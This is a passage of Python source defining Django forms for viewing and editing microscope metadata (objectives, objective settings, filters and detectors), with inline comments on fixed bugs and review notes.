            set_widget_attrs(self.fields["nominalMagnification"])
        except Exception:
            self.fields["nominalMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Nominal magnification",
                required=False,
            )
            set_widget_attrs(self.fields["nominalMagnification"])
        # Calibrated Magnification
        try:
            if kwargs["initial"]["objective"].calibratedMagnification is not None:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].calibratedMagnification,
                    label="Calibrated magnification",
                    required=False,
                )
            else:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    label="Calibrated magnification",
                    required=False,
                )
            set_widget_attrs(self.fields["calibratedMagnification"])
        except Exception:
            self.fields["calibratedMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Calibrated magnification",
                required=False,
            )
            set_widget_attrs(self.fields["calibratedMagnification"])
        # Lens NA
        try:
            if kwargs["initial"]["objective"].lensNA is not None:
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].lensNA,
                    label="Lens NA",
                    required=False,
                )
            else:
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    # consistency: label was missing only in this branch
                    label="Lens NA",
                    required=False,
                )
            set_widget_attrs(self.fields["lensNA"])
        except Exception:
            self.fields["lensNA"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lens NA",
                required=False,
            )
            set_widget_attrs(self.fields["lensNA"])
        # Immersion
        try:
            if kwargs["initial"]["objective"].getImmersion() is not None:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "immersion",
                                options=True,
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objective"].getImmersion().value,
                    required=False,
                )
            else:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "immersion",
                                options=True,
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["immersion"])
        except Exception:
            self.fields["immersion"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["immersion"])
        # Correction
        try:
            if kwargs["initial"]["objective"].getCorrection() is not None:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "correction",
                                options=True,
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objective"].getCorrection().value,
                    required=False,
                )
            else:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "correction",
                                options=True,
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["correction"])
        except Exception:
            self.fields["correction"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["correction"])
        # Working Distance
        try:
            if kwargs["initial"]["objective"].workingDistance is not None:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].workingDistance.getValue(),
                    label=(
                        "Working distance (%s)"
                        % kwargs["initial"]["objective"].workingDistance.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    label="Working distance",
                    required=False,
                )
            set_widget_attrs(self.fields["workingDistance"])
        except Exception:
            self.fields["workingDistance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Working distance",
                required=False,
            )
            set_widget_attrs(self.fields["workingDistance"])
        # Iris
        try:
            if kwargs["initial"]["objective"].getIris() is not None:
                self.fields["iris"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "iris", options=True
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objective"].getIris().value,
                    required=False,
                )
            else:
                self.fields["iris"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "iris", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["iris"])
        except Exception:
            self.fields["iris"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["iris"])
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
        ]
class MetadataObjectiveSettingsForm(MetadataObjectiveForm):
    """Extends MetadataObjectiveForm with ObjectiveSettings fields
    (correction collar, medium, refractive index) read from
    ``kwargs["initial"]["objectiveSettings"]``.

    Each field follows the parent's pattern: initialise from the
    attribute when set, blank when unset, and fall back to a read-only
    "N/A" placeholder if the attribute access raises.
    """

    # Choices offered for boolean-valued fields rendered as a select.
    BOOLEAN_CHOICES = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )

    def __init__(self, *args, **kwargs):
        # Parent builds the Objective fields first; settings fields are
        # appended after, then keyOrder fixes the display order of both.
        super(MetadataObjectiveSettingsForm, self).__init__(*args, **kwargs)
        # Objective Settings
        # Correction Collar
        try:
            if kwargs["initial"]["objectiveSettings"].correctionCollar is not None:
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objectiveSettings"].correctionCollar,
                    label="Correction collar",
                    required=False,
                )
            else:
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    label="Correction collar",
                    required=False,
                )
            set_widget_attrs(self.fields["correctionCollar"])
        except Exception:
            # Attribute missing/unreadable: show a read-only placeholder.
            self.fields["correctionCollar"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Correction collar",
                required=False,
            )
            set_widget_attrs(self.fields["correctionCollar"])
        # Medium
        try:
            if kwargs["initial"]["objectiveSettings"].getMedium() is not None:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "medium",
                                options=True,
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objectiveSettings"].getMedium().value,
                    required=False,
                )
            else:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "medium",
                                options=True,
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["medium"])
        except Exception:
            self.fields["medium"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["medium"])
        # Refractive Index
        try:
            if kwargs["initial"]["objectiveSettings"].refractiveIndex is not None:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "refractiveIndex",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objectiveSettings"].refractiveIndex,
                    label="Refractive index",
                    required=False,
                )
            else:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "refractiveIndex",
                            ),
                        }
                    ),
                    label="Refractive index",
                    required=False,
                )
            set_widget_attrs(self.fields["refractiveIndex"])
        except Exception:
            self.fields["refractiveIndex"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Refractive index",
                required=False,
            )
            set_widget_attrs(self.fields["refractiveIndex"])
        # Display order: inherited Objective fields first, then settings.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
            "correctionCollar",
            "medium",
            "refractiveIndex",
        ]
class MetadataFilterForm(forms.Form):
    """Form for viewing/editing Filter metadata from
    ``kwargs["initial"]["filter"]``.

    Each field follows the same pattern: initialise from the attribute
    when set, blank when unset, and fall back to a read-only "N/A"
    placeholder if the attribute access raises.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataFilterForm, self).__init__(*args, **kwargs)
        # Filter
        # Manufacturer
        try:
            if kwargs["initial"]["filter"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Model
        try:
            if kwargs["initial"]["filter"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Serial Number
        try:
            if kwargs["initial"]["filter"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number
        try:
            if kwargs["initial"]["filter"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Filter wheel
        try:
            if kwargs["initial"]["filter"].filterWheel is not None:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].filterWheel,
                    label="Filter wheel",
                    required=False,
                )
            else:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    label="Filter wheel",
                    required=False,
                )
            set_widget_attrs(self.fields["filterWheel"])
        except Exception:
            self.fields["filterWheel"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Filter wheel",
                required=False,
            )
            set_widget_attrs(self.fields["filterWheel"])
        # Type
        try:
            if kwargs["initial"]["filter"].getFilterType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "type", options=True
                            )
                        }
                    ),
                    initial=kwargs["initial"]["filter"].getFilterType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "type", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["type"])
        # Cut in
        # NOTE: this lookup is outside the try blocks, so a raising getter
        # would propagate rather than fall back to "N/A".
        tr = kwargs["initial"]["filter"].getTransmittanceRange()
        try:
            if tr is not None and tr.cutIn is not None:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    # use the already-fetched range instead of re-fetching it
                    initial=tr.cutIn.getValue(),
                    label="Cut in (%s)" % tr.cutIn.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    label="Cut in",
                    required=False,
                )
            set_widget_attrs(self.fields["cutIn"])
        except Exception:
            self.fields["cutIn"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in",
                required=False,
            )
            set_widget_attrs(self.fields["cutIn"])
        # Cut out
        try:
            if tr is not None and tr.cutOut is not None:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    initial=tr.cutOut.getValue(),
                    label="Cut out (%s)" % tr.cutOut.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    label="Cut out",
                    required=False,
                )
            set_widget_attrs(self.fields["cutOut"])
        except Exception:
            self.fields["cutOut"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out",
                required=False,
            )
            set_widget_attrs(self.fields["cutOut"])
        # Cut in tolerance
        try:
            if tr is not None and tr.cutInTolerance is not None:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    initial=tr.cutInTolerance.getValue(),
                    label=("Cut in tolerance (%s)" % tr.cutInTolerance.getSymbol()),
                    required=False,
                )
            else:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    label="Cut in tolerance",
                    required=False,
                )
            set_widget_attrs(self.fields["cutInTolerance"])
        except Exception:
            self.fields["cutInTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in tolerance",
                required=False,
            )
            set_widget_attrs(self.fields["cutInTolerance"])
        # Cut out tolerance
        try:
            if tr is not None and tr.cutOutTolerance is not None:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # fix: was saved under "cutOut", silently
                            # overwriting the cut-out value on edit
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    initial=tr.cutOutTolerance.getValue(),
                    label=("Cut out tolerance (%s)" % tr.cutOutTolerance.getSymbol()),
                    required=False,
                )
            else:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # fix: was saved under "cutOut" (see above)
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    label="Cut out tolerance",
                    required=False,
                )
            set_widget_attrs(self.fields["cutOutTolerance"])
        except Exception:
            self.fields["cutOutTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out tolerance",
                required=False,
            )
            set_widget_attrs(self.fields["cutOutTolerance"])
        # Transmittance
        try:
            if kwargs["initial"]["filter"].transmittanceRange is not None:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    initial=formatPercentFraction(
                        kwargs["initial"]["filter"]
                        .getTransmittanceRange()
                        .transmittance
                    ),
                    label="Transmittance (%)",
                    required=False,
                )
            else:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["transmittance"])
        except Exception:
            self.fields["transmittance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["transmittance"])
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
            "filterWheel",
            "cutIn",
            "cutOut",
            "cutInTolerance",
            "cutOutTolerance",
            "transmittance",
        ]
class MetadataDetectorForm(forms.Form):
    """Form for viewing/editing Detector and DetectorSettings metadata.

    Reads ``kwargs["initial"]["detector"]`` and
    ``kwargs["initial"]["detectorSettings"]`` (either may be None). Each
    field follows the same pattern: initialise from the attribute when
    set, blank when unset, and fall back to a read-only "N/A"
    placeholder if the attribute access raises.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataDetectorForm, self).__init__(*args, **kwargs)
        detSet = kwargs["initial"]["detectorSettings"]
        detector = kwargs["initial"]["detector"]
        # Manufacturer
        try:
            if detector is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "manufacturer"),
                        }
                    ),
                    initial=detector.manufacturer,
                    required=False,
                )
            else:
                # NOTE(review): detector is None here, so detector.id raises
                # and this always falls through to the "N/A" field below.
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "manufacturer"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Model
        try:
            if detector is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "model"),
                        }
                    ),
                    initial=detector.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "model"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # SN
        try:
            if detector is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "serialNumber"),
                        }
                    ),
                    initial=detector.serialNumber,
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "serialNumber"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number (NB. Until OMERO model is updated in 4.3, this will
        # throw since lotNumber is not yet supported)
        try:
            if detector is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "lotNumber"),
                        }
                    ),
                    initial=detector.lotNumber,
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "lotNumber"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Type
        try:
            if detector.getDetectorType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(detector.id, "type", options=True)
                        }
                    ),
                    initial=detector.getDetectorType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(detector.id, "type", options=True)
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["type"])
        # Gain
        try:
            if detSet is not None:
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
                    ),
                    initial=detSet.gain,
                    required=False,
                )
            elif detector is not None:
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "gain"),
                        }
                    ),
                    initial=detector.gain,
                    required=False,
                )
            else:
                # NOTE(review): both detSet and detector are None here, so
                # detSet.id raises and the "N/A" fallback is used.
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["gain"])
        except Exception:
            self.fields["gain"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["gain"])
        # Voltage
        try:
            if detSet is not None and detSet.voltage is not None:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "voltage"),
                        }
                    ),
                    initial=detSet.voltage.getValue(),
                    label="Voltage (%s)" % detSet.voltage.getSymbol(),
                    required=False,
                )
            elif detector is not None:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "voltage"),
                        }
                    ),
                    initial=detector.voltage.getValue(),
                    label="Voltage (%s)" % detector.voltage.getSymbol(),
                    required=False,
                )
            else:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "voltage"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["voltage"])
        except Exception:
            self.fields["voltage"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["voltage"])
        # Offset
        try:
            if detSet is not None:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "offsetValue"),
                        }
                    ),
                    initial=detSet.offsetValue,
                    label="Offset",
                    required=False,
                )
            elif detector is not None:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "offsetValue"),
                        }
                    ),
                    initial=detector.offsetValue,
                    label="Offset",
                    required=False,
                )
            else:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "offsetValue"),
                        }
                    ),
                    label="Offset",
                    required=False,
                )
            set_widget_attrs(self.fields["offsetValue"])
        except Exception:
            self.fields["offsetValue"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Offset",
                required=False,
            )
            set_widget_attrs(self.fields["offsetValue"])
        # Zoom
        try:
            if detector is not None:
                self.fields["zoom"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # fix: was saved under "voltage", clobbering the
                            # detector voltage when zoom was edited
                            "onchange": save_metadata(detector.id, "zoom"),
                        }
                    ),
                    initial=detector.zoom,
                    required=False,
                )
            else:
                self.fields["zoom"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # fix: was saved under "voltage" (see above)
                            "onchange": save_metadata(detector.id, "zoom"),
                        }
                    ),
